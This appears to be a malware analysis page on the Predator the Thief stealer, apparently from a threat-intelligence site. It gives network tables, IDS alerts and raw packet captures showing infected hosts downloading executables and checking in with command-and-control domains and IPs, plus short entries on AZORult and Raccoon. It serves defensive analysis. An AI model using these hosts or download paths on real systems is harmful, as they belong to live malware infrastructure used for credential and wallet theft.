Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallets.
| TypeStealer | Originex-USSR |
| First seen1 July, 2018 | Last seen29 May, 2020 |
| PID | Process | IP | ASN | CN | Reputation |
|---|---|---|---|---|---|
| 2492 | uplads.exe | 185.136.169.150:80 | DE | malicious | |
| 2576 | MSIE711.tmp | 88.99.66.31:443 | Hetzner Online GmbH | DE | malicious |
| 932 | dllhost.exe | 217.8.117.63:80 | –– | malicious |
| Domain | IP | Reputation |
|---|---|---|
| iplogger.org | 88.99.66.31 | shared |
| PID | Process | Class | Message |
|---|---|---|---|
| 2492 | uplads.exe | A Network Trojan was detected | STEALER [PTsecurity] Win32/Spy.Agent.PLQ (Predator Stealer) CnC Checkin |
| 932 | dllhost.exe | A Network Trojan was detected | STEALER [PTsecurity] Win32/Spy.Agent.PLQ (Predator Stealer) CnC Checkin |
2020-05-30 09:10:05.558831 IP 10.1.10.15.49762 > 217.8.117.63.80: Flags [P.], seq 1:495, ack 1, win 16425, length 494: HTTP: GET /1.exe HTTP/1.1
E…FI@…PA
.
…u?.b.P..ss..HsP.@)….GET /1.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=202682-
Unless-Modified-Since: Sat, 30 May 2020 02:28:46 GMT
If-Range: “5ed1c4de-de000”
Host: tldrbox.top
Connection: Keep-Alive
2020-05-30 09:11:24.486820 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
E…K3@…F.
.
.@F…m.P.m.l….P..\….GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:24.581340 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [.], ack 198, win 13936, length 0
E..(=.@.3…@F..
.
..P.m…..m.1P.6p.&……..
2020-05-30 09:11:24.582243 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [F.], seq 1, ack 198, win 13936, length 0
E..(=.@.3…@F..
.
..P.m…..m.1P.6p.%……..
2020-05-30 09:11:24.582431 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [.], ack 2, win 64860, length 0
E..(K6@…Gy
.
.@F…m.P.m.1….P..\$9……..
2020-05-30 09:11:24.582560 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [F.], seq 198, ack 2, win 64860, length 0
E..(K7@…Gx
.
.@F…m.P.m.1….P..\$8……..
2020-05-30 09:11:24.674548 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [.], ack 199, win 13936, length 0
E..(..@.3…@F..
.
..P.m…..m.2P.6p.$……..
2020-05-30 09:11:24.686266 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [S], seq 764056628, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4K8@…Gk
.
.@F…o.P-..4…… .bw…………..
2020-05-30 09:11:24.686520 STP 802.1w, Rapid STP, Flags [Learn, Forward, Agreement], bridge-id 8000.00:9a:d2:51:a3:82.803f, length 43
….|…..Q………..Q…?…………….
2020-05-30 09:11:24.774426 IP 64.70.19.203.80 > 10.1.10.15.49775: Flags [S.], seq 2516359664, ack 764056629, win 14600, options [mss 1380], length 0
E..,..@.3…@F..
.
..P.o….-..5`.9.B……d..
2020-05-30 09:11:24.774676 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [.], ack 1, win 64860, length 0
E..(K9@…Gv
.
.@F…o.P-..5….P..\……….
2020-05-30 09:11:24.774840 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /2 HTTP/1.1
E…K:@…F.
.
.@F…o.P-..5….P..\….GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:24.774840 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /2 HTTP/1.1
E…K:@…F.
.
.@F…o.P-..5….P..\….GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:25.054712 IP 10.1.10.15.49776 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /3 HTTP/1.1
E…KA@…F.
.
.@F…p.P.+.t…LP..\.~..GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:25.338839 IP 10.1.10.15.49777 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /4 HTTP/1.1
E…KH@…F.
.
.@F…q.PUI.p.$6.P..\….GET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:25.634919 IP 10.1.10.15.49778 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /5 HTTP/1.1
E…KN@…F.
.
.@F…r.P…q….P..\….GET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:25.915797 IP 10.1.10.15.49779 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /6 HTTP/1.1
E…KT@…F.
.
.@F…s.P..C.C…P..\.a..GET /6 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:26.210240 IP 10.1.10.15.49780 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /7 HTTP/1.1
E…KZ@…F.
.
.@F…t.P,)…..wP..\.l..GET /7 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:26.490418 IP 10.1.10.15.49781 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 16560, length 197: HTTP: GET /8 HTTP/1.1
E…K`@…F.
.
.@F…u.P..IC….P.@..{..GET /8 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:26.948325 IP 10.1.10.15.49782 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
E…Kf@…F.
.
.@F…v.P….3..oP..\….GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toirgsiorgididii.ws
2020-05-30 09:11:29.467097 IP 10.1.10.15.49790 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 16560, length 197: HTTP: GET /1 HTTP/1.1
E…K.@…F[
.
.@F…~.P…..{..P.@.B…GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tefiefijiejdijef.ws
2020-05-30 09:11:31.927173 IP 10.1.10.15.49798 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
E…K.@…F3
.
.@F…..P)…B…P..\….GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tinbeafbiaebfiie.ws
2020-05-30 09:11:36.856234 IP 10.1.10.15.49814 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
E…L @…E.
.
.@F…..PF..NZ…P..\.R..GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tpleflpokadkeoot.ws
2020-05-30 09:12:14.943782 IP 10.1.10.15.50028 > 64.70.19.203.80: Flags [P.], seq 1:201, ack 1, win 64860, length 200: HTTP: GET /pe/7 HTTP/1.1
E…PN@…A.
.
.@F…l.P.wr./…P..\….GET /pe/7 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tgauheudbbchaiii.ws
Written By
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozill...
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info...
Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification:DownloaderSpyware Threat Names:AZORult v3Gen:Varian...
Malware downloads and loads the dropper from the 64.31.23.26 but the host is down so it dies at this point. Hostile IPs: 64.31.23.26 81.177.135.143 2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win ...
